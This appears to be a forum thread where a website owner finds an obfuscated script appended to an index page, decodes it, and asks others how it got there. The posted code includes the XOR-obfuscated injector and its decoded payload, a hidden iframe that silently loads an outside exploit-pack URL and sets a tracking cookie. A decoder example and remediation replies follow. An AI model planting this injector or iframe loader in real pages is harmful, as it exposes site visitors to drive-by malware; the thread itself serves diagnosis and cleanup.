Hi all, I recently found the following code added on to the end of my index page:
Code:
<!--<S>--><script>
try {
var oOX='ppupHupqupaupbupyupJupxup7upCupeupiupcupzupAupsuprupKupUup5upkupfupLupIupPup4upBupNupdupjupXuptup9up8up3upYupRupFupwupoupGuplupMupSup6upZupmupWupgupDupnuphupTupVuHpuHHuHquHauHbuHy';
var tSF='u', AWL=Array(56626^56735,226,KG('242'),KG('227'),248,KG('225'),KG('229'),27941^28052,253,20712^20504,255,KG('246'),KG('228'),KG('244'),KG('172'),179,KG('251'),231,KG('175'),156,KG('155'),KG('245'),162,170,160,KG('247'),KG('185'),KG('254'),KG('252'),191,KG('250'),KG('233'),45475^45437,186,KG('184'),188,60713^60867,KG('249'),7437^7590,190,7474^7617,58640^58820,KG('208'),KG('189'),61411^61232,161,30649^30559,232,58259^58177,47178^47236,236,KG('213'),KG('197'),KG('167'),KG('187'),KG('163'),8550^8643,KG('214'),220,KG('194'));
var ge;
var Xbo,DZ;
var fc='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';
var RU='';
function KG(xt){
return parseInt(xt)
}
oOX=oOX.split(tSF);
for(ge=0;ge<fc.length;ge+=2){
DZ=fc.substr(ge,2);
for(Xbo=0;Xbo<oOX.length;Xbo++){
if(oOX[Xbo]==DZ) break;
}
RU+=String.fromCharCode(AWL[Xbo]^145);
}
document.write(RU);
}
catch(e){
}</script><!--</S>-->
Based on the fromCharCode and document.write statements, I knew something fishy was up, so I modified it a bit to see the output and I get the following code:
Code:
<script language="javascript">
var cn = "undcr3";
var cv = "1";
if(document.cookie.indexOf(cn+"="+cv) == -1)
{
var url = "http://deutchbank.net/mpack/index.php";
var o = document.createElement("iframe");o.setAttribute("src", url);
o.frameBorder=0; o.width=1; o.height=1; o.style.display="none";
try { document.body.appendChild(o); rsys_sc(cn,cv);}
catch(e){
document.write("<html><body></body></html>");
document.body.appendChild(o); rsys_sc(cn,cv);
}}
function rsys_sc(cn,cv){ var t= new Date(); var e= new Date(); e.setTime(t.getTime()+3600000*24); document.cookie = cn+"="+escape(cv)+";expires="+e.toGMTString(); }
</script>
Does anyone have any clue what this is and how it may have got there?
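Added example (not part of the original posts): a static decoder for the lookup-table plus XOR scheme in the first script, which recovers the text without running the sample or calling document.write. The token string and array entries are the first seven from the posted script; the payload string is constructed, and the names `parseItem`, `decode` and `SAMPLE` are this example's own.

```javascript
// Evaluate one array item as text: "226", "KG('242')" or "56626^56735".
// Nothing from the sample is executed (no eval, no document.write).
function parseItem(src) {
  const s = src.trim();
  let m;
  if ((m = /^(\d+)$/.exec(s))) return Number(m[1]);
  if ((m = /^\w+\('(\d+)'\)$/.exec(s))) return parseInt(m[1], 10); // parseInt wrapper
  if ((m = /^(\d+)\^(\d+)$/.exec(s))) return Number(m[1]) ^ Number(m[2]);
  throw new Error('unsupported array item: ' + s);
}

// tokens: separator-joined two-character tokens; values: source text of the
// array body; key: XOR constant; payload: concatenated tokens to decode.
function decode(tokens, sep, values, key, payload) {
  const index = new Map();
  tokens.split(sep).forEach((t, i) => { if (!index.has(t)) index.set(t, i); });
  const table = values.split(',').map(parseItem);
  const unknown = [];
  let text = '';
  for (let i = 0; i < payload.length; i += 2) {
    const tok = payload.slice(i, i + 2);
    const pos = index.get(tok);
    if (pos === undefined || pos >= table.length) {
      unknown.push(tok);      // report tokens the table cannot resolve
      text += '\uFFFD';
      continue;
    }
    text += String.fromCharCode(table[pos] ^ key);
  }
  return { text, unknown };
}

const SAMPLE = {
  tokens: 'ppupHupqupaupbupyupJ', // first seven tokens of the posted table
  sep: 'u',
  values: "56626^56735,226,KG('242'),KG('227'),248,KG('225'),KG('229')",
  key: 145,
  payload: 'pppHpqpapbpypJ',      // constructed payload, not from the page
};

function decodeSample() {
  return decode(SAMPLE.tokens, SAMPLE.sep, SAMPLE.values, SAMPLE.key, SAMPLE.payload);
}

console.log(JSON.stringify(decodeSample()));
```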
Thanks for the replies. No, I use servage.net, and it's paid hosting that doesn't show ads, and only Google AdSense banners are shown (which was scripting that I specifically added). I noticed the code was used across all other sites on my account (with different variable names, etc., but the output was the same). It was even on one site that is completely ad free, so there was no reason for it to show up there, at least not by my doing. I have a ticket open with the hosting service to see what they say about it, and I have already changed all of my passwords (FTP and web interface login).
Hmm, I hope that is all that has happened. Though I found it by performing XHTML validation and it failed for the first time in a year. Maybe it's something new, but regardless, they should notify me if they are going to mess up my validated code. I'll wait and see what they say. Thanks for the reply again.
Done, the code was not added. I should note that it was only added to my index.php or main.php files. Only on the main page, whatever that page was (not in the header or footer files).
I came across something similar years ago when I was using a control panel to manage my sites. Maybe Ensim, I don't remember.. but I finally discovered that the control panel was adding the code. I got rid of it.
OK, well, I actually use Dreamweaver and FTP usually. But if it is something like that, I think the hosting company would know about it and they will tell me. I hope you all are right. Otherwise, 4 money-making sites were compromised in a manner that I don't even know about.
Also, for the heck of it... does this code exist in the file itself or only when you view source? I know that sounds weird but... can you download the file from ftp and open the raw file?
It is in the file itself, in the .php. I went through and deleted it all, and now it is gone. And it doesn't sound weird. I know exactly what you're asking.